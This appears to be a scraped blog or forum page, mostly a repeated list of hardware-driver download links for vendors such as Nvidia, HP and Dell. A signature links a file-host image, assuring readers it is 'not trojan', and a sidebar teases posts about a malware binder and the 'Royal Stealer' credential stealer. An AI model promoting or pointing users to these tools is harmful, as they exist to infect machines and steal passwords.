http://support.alienware.com/Support...port_Area.aspx
Acer:
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
Toshiba:
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
Other
http://www.digg.com/software/Almost_...Hate_Searching
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
Drivers:
http://www.driverzone.com/
http://www.nvidia.com/content/drivers/drivers.asp
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://www.microsoft.com/hardware/mo.../Download.mspx
http://www.digg.com/software/Almost_...Hate_Searching
http://driverpacks.net/Projects/DriverPacks/
http://www.ageia.com/products/drivers.html
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
www.driversguide.com
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
http://downloadfinder.intel.com/scri...port_intel.asp
http://www.hp.com/country/us/en/support.html
http://support.dlink.com/downloads/
www.totallydrivers.com
http://www.lge.com/support/software.jsp
http://www.xfxforce.com/web/support/drivers.jspa
http://support.asus.com/faq/faq.aspx
http://www.pcpitstop.com/driverscan.asp
http://www.voodoofiles.com/
http://www.usa.canon.com/consumer/co...wnloadIndexAct
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
http://www.chaintechusa.com/tw/eng/Download/
http://www.msi.com.tw/program/suppor...t_dvr_list.php
http://www.biostar-usa.com/downloadmain.asp
http://www.razerpro.com/index.php?op...d=13&Itemid=27
http://www.abit-usa.com/downloads/
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
http://www.machspeed.com/products.htm
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
http://www.pioneer-eur.com/eur/conte...t/support.html
http://www.diamondmm.com/newarchivelicense.php
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
http://www.emachines.com/support/product_support.html
https://iomega-na-en.custhelp.com/cg...ci/product.php
http://www.mitsubishi-electric.com.a...oads/index.htm
http://www.zboard.com/global/downloads/drivers.asp
http://www.belkin.com/support/download/download.asp
http://www.samsung.com/support/produ...oad/index.aspx
http://www.viewsonic.com/support/drivers/index.cfm
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
http://www.plextor.com/english/suppo...s/drivers.html
http://www.liteonit.com/global/index...pper&Itemid=75
http://www.tv-cards.com/drivers.php
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
http://www.cisco.com/en/US/support/index.html
http://support.dell.com/support/downloads/index.aspx
http://www.apple.com/downloads/macosx/drivers/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
creative sound:
http://us.creative.com/support/downloads/
direct x home page
http://www.microsoft.com/windows/directx/default.aspx
ati driver home page
http://www.ati.com/support/driver.html
__________________
mr amine from morocco
age ;22
my mission is to help u in ur life
my pics here u found it
http://www.fileden.com/files/2008/6/1/1939264/17022008%28006%29.jpg :) dont worrey is not trojan
ok let's start my first topic
i choose for u the best web site to found your driver who u looking up have fun -eng-
je choisie pour vous les meilleur adresse web pour vos driver
http://www.driverzone.com/
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://driverpacks.net/Projects/DriverPacks/
http://driversguide.com/
http://www.totallydrivers.com/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
Direct X:
http://www.microsoft.com/windows/directx/default.aspx
Video/graphics drivers:
Nvidia:
http://www.nvidia.com/content/drivers/drivers.asp
Ageia:
http://www.ageia.com/products/drivers.html
Ati:
http://www.ati.com/support/driver.html
Tv Tuner Cards:
http://www.tv-cards.com/drivers.php
Sound Drivers:
Creative Labs Sound Blaster:
http://us.creative.com/support/downloads/
Part Manufacturer Drivers:
Hp:
http://www.hp.com/country/us/en/support.html
Xfx:
http://www.xfxforce.com/web/support/drivers.jspa
Asus:
http://support.asus.com/faq/faq.aspx
D-link:
http://support.dlink.com/downloads/
Lg:
http://www.lge.com/support/software.jsp
Cannon:
http://www.usa.canon.com/consumer/co...wnloadIndexAct
Lexmark:
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
Chaintech:
http://www.chaintechusa.com/tw/eng/Download/
Msi:
http://www.msi.com.tw/program/suppor...t_dvr_list.php
Biostar:
http://www.biostar-usa.com/downloadmain.asp
Razer:
http://www.razerpro.com/index.php?op...d=13&Itemid=27
Abit:
http://www.abit-usa.com/downloads/
Epson:
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
Mach:
http://www.machspeed.com/products.htm
Linksys:
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
Pioneer:
http://www.pioneer-eur.com/eur/conte...t/support.html
Diamond:
http://www.diamondmm.com/newarchivelicense.php
Iomega:
https://iomega-na-en.custhelp.com/cg...ci/product.php
Mitsubishi:
http://www.mitsubishi-electric.com.a...oads/index.htm
Zboard:
http://www.zboard.com/global/downloads/drivers.asp
Belkin:
http://www.belkin.com/support/download/download.asp
Samsung:
http://www.samsung.com/support/produ...oad/index.aspx
Viewsonic:
http://www.viewsonic.com/support/drivers/index.cfm
Plextor:
http://www.plextor.com/english/suppo...s/drivers.html
Liteon-It:
http://www.liteonit.com/global/index...pper&Itemid=75
Microsoft:
http://www.microsoft.com/hardware/mo.../Download.mspx
Gigabyte:
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
Logitech:
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
Voodoo:
http://www.voodoofiles.com/
Intel:
http://downloadfinder.intel.com/scri...port_intel.asp
Cisco:
http://www.cisco.com/en/US/support/index.html
Computer Manufacturer Drivers:
Dell:
http://support.dell.com/support/downloads/index.aspx
Apple (mac) :
http://www.apple.com/downloads/macosx/drivers/
Shuttle:
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
Hp:
http://www.hp.com/country/us/en/support.html
Sony:
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
E-Machines:
http://www.emachines.com/support/product_support.html
Voodoo Game Doctor:
http://www.voodoopc.com/authorization/myaccount.aspx
Alienware:
http://support.alienware.com/Support...port_Area.aspx
Acer:
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
Toshiba:
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
Other
http://www.digg.com/software/Almost_...Hate_Searching
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
Drivers:
http://www.driverzone.com/
http://www.nvidia.com/content/drivers/drivers.asp
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://www.microsoft.com/hardware/mo.../Download.mspx
http://www.digg.com/software/Almost_...Hate_Searching
http://driverpacks.net/Projects/DriverPacks/
http://www.ageia.com/products/drivers.html
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
www.driversguide.com
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
http://downloadfinder.intel.com/scri...port_intel.asp
http://www.hp.com/country/us/en/support.html
http://support.dlink.com/downloads/
www.totallydrivers.com
http://www.lge.com/support/software.jsp
http://www.xfxforce.com/web/support/drivers.jspa
http://support.asus.com/faq/faq.aspx
http://www.pcpitstop.com/driverscan.asp
http://www.voodoofiles.com/
http://www.usa.canon.com/consumer/co...wnloadIndexAct
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
http://www.chaintechusa.com/tw/eng/Download/
http://www.msi.com.tw/program/suppor...t_dvr_list.php
http://www.biostar-usa.com/downloadmain.asp
http://www.razerpro.com/index.php?op...d=13&Itemid=27
http://www.abit-usa.com/downloads/
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
http://www.machspeed.com/products.htm
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
http://www.pioneer-eur.com/eur/conte...t/support.html
http://www.diamondmm.com/newarchivelicense.php
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
http://www.emachines.com/support/product_support.html
https://iomega-na-en.custhelp.com/cg...ci/product.php
http://www.mitsubishi-electric.com.a...oads/index.htm
http://www.zboard.com/global/downloads/drivers.asp
http://www.belkin.com/support/download/download.asp
http://www.samsung.com/support/produ...oad/index.aspx
http://www.viewsonic.com/support/drivers/index.cfm
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
http://www.plextor.com/english/suppo...s/drivers.html
http://www.liteonit.com/global/index...pper&Itemid=75
http://www.tv-cards.com/drivers.php
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
http://www.cisco.com/en/US/support/index.html
http://support.dell.com/support/downloads/index.aspx
http://www.apple.com/downloads/macosx/drivers/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
creative sound:
http://us.creative.com/support/downloads/
direct x home page
http://www.microsoft.com/windows/directx/default.aspx
ati driver home page
http://www.ati.com/support/driver.html
__________________
شرح التعديل على قوالب البلوجر
الاعلانات :
انظم الينا على الفايسبوك
المشاركات الشائعة
-
internet gratuit avec le service imedia comment.? pour avoir imedia gratuit sur ton mobile enter ces paramters svp avant tt assurer que ta c...
-
و سيتناول الموضوع التالي:- 1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7....
-
EXCLUSIVE projet fucking ass maroc telecome ...
-
to have a fast weebo with firefox please fellow the instruction : Clearing Your Cache/Cookies Many issue can be alleviated by clearing your ...
-
Nmap and Zenmap (the graphical front end) are available in several versions and formats. Recent source releases and binary packages are des...
-
Diamond Binder // Diamond Binder is a binder bid for source created by sharky , the tool possesses the functions basicas of any binder. ...
-
اولا ما يجب عليك معرفته اخي الكريم اختي الكريمة ان ما يقصد بالبريد الثلاتي هو بريد من الشكل التالي xxx@hotmail.com ; pdf@hotmail.com , zik@...
-
Royal Stealer v1.0e > April 21st, 2009 This is the latest version of the Stealer of Shark...
-
لعل من اشر الامور التي يمكن ان تقع لك على الفيسبوك هو تعطيل حسابك لهذا كان علينا الحذر في إستخدام خدمة الفيسبوك هاته الاخيرة التي تستوجب مج...
-
إنسى مكبرات الصوت التقليدية الان مكبرات صوت زجاجية !! نعم هي مكبرات صوت زجاجية بأشكال هندسية رائعة ودقة في التصنيع تستطيع هاته القطع الزجاجي...